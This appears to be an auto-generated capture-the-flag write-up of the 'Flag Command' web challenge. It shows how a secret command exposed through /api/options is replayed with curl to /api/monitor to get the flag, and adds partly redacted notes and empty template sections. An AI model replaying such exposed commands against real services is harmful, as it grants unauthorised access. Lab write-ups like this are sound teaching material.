Flag Command
Web-based text adventure game ("Dimensional Escape Quest") with a terminal interface. Three JS modules handle game logic client-side. Reading main.js reveals the command validation logic in CheckMessage(): The game accepts commands from the current step's...
Scenario
Flag Command attack path
Web-based text adventure game ("Dimensional Escape Quest") with a terminal interface. Three JS modules handle game logic client-side. Reading main.js reveals the command validation logic in CheckMessage(): The game accepts commands from the current step's...
Objective
Challenge walkthrough focused on Web evidence, validation, and reusable operator lessons.
Walkthrough flow
Source and route audit
Trust boundary flaw
Exploit request chain
Admin or proof proof
Source coverage
Moderate source coverage
Status: partial. This article is generated from 5 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.
- Web/FlagCommand/writeup.md
- htb-challenge/Web/FlagCommand/notes.md
- htb-challenge/Web/FlagCommand/memory-summary.md
- htb-challenge/Web/FlagCommand/hypothesis-board.md
- HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/challenge__Web__FlagCommand__notes.md.94499c488f.md
Technical Walkthrough
Flag Command - Writeup
Challenge Info
- Name: Flag Command
- Category: Web
- Difficulty: Very Easy
- Flag:
<flag stored in loot/flag.txt>
Approach
Triage
Web-based text adventure game ("Dimensional Escape Quest") with a terminal interface. Three JS modules handle game logic client-side.
Analysis
Reading main.js reveals the command validation logic in CheckMessage():
if (availableOptions[currentStep].includes(currentCommand) || availableOptions['secret'].includes(currentCommand)) {The game accepts commands from the current step's options OR from a secret array — bypassing game progression entirely.
The options are fetched from /api/options at startup.
Solve
# 1. Get all options including the secret
curl -s http://TARGET:PORT/api/options
# Returns: {"allPossibleCommands": {..., "secret": ["Blip-blop, in a pickle with a hiccup! Shmiggity-shmack"]}}
# 2. Send the secret command
curl -s -X POST http://TARGET:PORT/api/monitor \
-H 'Content-Type: application/json' \
-d '{"command": "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack"}'
# Returns: {"message": "<flag stored in loot/flag.txt>"}Key Insight
Client-side JavaScript exposes the full game logic including a hidden "secret" command array. The server trusts any command in that array regardless of game state. Developer tools (reading JS source) immediately reveals the shortcut.
Time: ~2 minutes
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Challenge: Flag Command
- Category: Web
- Difficulty: Very Easy
- Target: http://<TARGET>:32332/
- Started: 2026-05-06
Evidence Ledger
| Timestamp | Action | Finding | Next |
|---|---|---|---|
| 00:00 | curl index.html | Terminal-style game, 3 JS modules (main.js, commands.js, game.js) | Read JS |
| 00:01 | Read main.js | CheckMessage() checks availableOptions['secret'] array alongside current step options | Fetch /api/options |
| 00:02 | GET /api/options | Secret command: "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack" | Send to /api/monitor |
| 00:02 | POST /api/monitor with secret command | Flag returned in response | Done |
Solution
- Client-side JS (
main.js) fetches game options from/api/options - Response contains a
"secret"key with a hidden command - The
CheckMessage()function accepts secret commands at any game step - Sending the secret command to
/api/monitorreturns the flag
| 2026-05-27T23:35:17Z | backfill | challenge-state.json | Legacy workspace backfilled with deterministic state | High | Validate before further work |
Memory Summary
Metadata
- Platform: HackTheBox Challenges
- Category:
- Challenge:
- Difficulty:
- Source workspace:
Validated Solve Chain
Concepts only. Do not include raw flags, reusable credentials, tokens, cookies, private keys, or live secrets.
1.
Reusable Lessons
-
Dead Ends
-
Tool Quirks
-
Evidence Paths
-
Ingestion Decision
- Proposed for LightRAG: yes/no
- Requires user approval before ingestion: yes
Hypothesis Board
| Rank | Path | Evidence | Missing Proof | Cheapest Validation | Confidence | Status |
|---|
Closed Branches
| Branch | Evidence Tested | Failure Output | Reason Closed | Revisit Condition |
|---|
Notes
Scope
- Challenge: <REDACTED>
- Category: Web
- Difficulty: Very Easy
- Target: http://<TARGET>:32332/
- Started: 2026-05-06
Evidence Ledger
| Timestamp | Action | Finding | Next |
|---|---|---|---|
| 00:00 | curl index.html | Terminal-style game, 3 JS modules (main.js, commands.js, game.js) | Read JS |
| 00: <REDACTED> | |||
| 00: <REDACTED>, in a pickle with a hiccup! Shmiggity-shmack" | Send to /api/monitor | ||
| 00: <REDACTED> |
Solution
- Client-side JS (
main.js) fetches game options from/api/options - Response contains a
"secret"key with a hidden command - The
CheckMessage()function accepts secret commands at any game step - Sending the secret command to
/api/monitorreturns the flag
| 2026-05-27T23:35:17Z | backfill | challenge-state.json | Legacy workspace backfilled with deterministic state | High | Validate before further work |
Technical analogy
How to remember this solve
Think of the web app like a building with signs on every door. The solve usually comes from reading the map carefully, finding the door the app forgot to hide, then sending the exact request that proves you understand the route.
For Flag Command, keep the mental model simple: identify the trusted assumption, prove it with the smallest safe test, then automate or repeat only the part that directly leads to the flag.